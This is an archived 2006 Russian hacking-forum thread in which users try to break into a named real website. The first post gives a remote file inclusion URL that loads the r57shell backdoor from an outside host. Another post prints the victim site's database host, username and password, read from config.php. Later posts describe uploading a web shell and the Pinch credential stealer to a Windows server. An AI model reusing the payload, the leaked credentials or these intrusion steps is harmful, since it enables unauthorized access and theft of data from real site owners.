Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Windows NT & Safe mode (php inj) (https://forum.antichat.xyz/showthread.php?t=21605)

DaemoniZ 11.07.2006 15:10

Windows NT & Safe mode (php inj)
 
Ребят... Подскажите как ломать... Я даже php бэкдор залить немогу.

http://www.rtk.it/SQuery/lib/gore.php?libpath=http://rst.void.ru/download/r57shell.txt?

Пасиба =)

zyl 11.07.2006 16:16

Это по-моему не из той оперы
Здесь ошибка вида:
Fatal error: Class gore: Cannot inherit from undefined class gamespy in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 8

А для загрузки шелла нужно чтобы была:
Warning: main(libpat): failed to open stream: No such file or directory in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 13
Warning: main(libpat): Failed opening 'libpat' for inclusion (include_path='.;/usr/local/php/PEAR') in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 1

Может там какая то переменная висела

DaemoniZ 11.07.2006 20:17

Хммм... А обойти-то можно как-нибудь? Что меня достаточно сильно удивило - я не могу нормально ползать по папкам.
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))

zyl 11.07.2006 21:29

Цитата:

Хммм... А обойти-то можно как-нибудь?
Возможно что ошибаюсь, но по моему нет.

Цитата:

Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет?
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php

Ch3ck 12.07.2006 00:13

Я как то читал про обход safe_mod но там жопа полная. Единсвенное чё можно пока сделать, так это читать любый файлы...(с помощью php_eval). Вот например небольшой кусок из config.php :
$dbhost = "62.149.150.56";
$dbuname = "Sql103994";
$dbpass = "41ebe44d";
$dbname = "Sql103994_1";
$prefix = "nuke";
$user_prefix = "nuke";
$dbtype = "MySQL";
$sitekey = "S·kQg*ит?^м#@и+~ю-?4Sd5%W@Y6Ђ7“ю2-dm29-.-39.3a8sUf+W9";
$gfx_chk = 7;
$subscription_url = "";
$admin_file = "admin";
$tipath = "images/topics/";
$advanced_editor = 0;
$display_errors = false;

DaemoniZ 12.07.2006 01:11

Цитата:

Сообщение от Dr.Check
Я как то читал про обход safe_mod но там жопа полная.[/I]

Да это действительно так. Дело все в том, что я даже не знаю как ломать. Хотелось-бы бэкдор залить (просто php файлик как-нить изменить) но вот понять не могу, где я могу писать, а где - нет.

Цитата:

Сообщение от zyl
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php

Это про chmod. Он в *.nix системах, а в моем случае NT.

Electro 08.08.2006 12:59

У меня анологичное ситуация (( Свервак под NT залил шелл + пинч на комп а вот команда C:\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф

Ch3ck 08.08.2006 14:52

Цитата:

У меня анологичное ситуация (( Свервак под NT залил шелл пинч на комп а вот команда C:\\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
Конечно не отвечаю, что выйдет, но попробуй так:
C:\\ start [путь] x.exe
[путь] до файла...если в этой же дире, то не надо... :cool:

hidden 08.08.2006 19:24

Цитата:

Сообщение от DaemoniZ
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))

Попробуй второй пример в "выполнить пхп код" вставить отсюда fileperms


Время: 15:19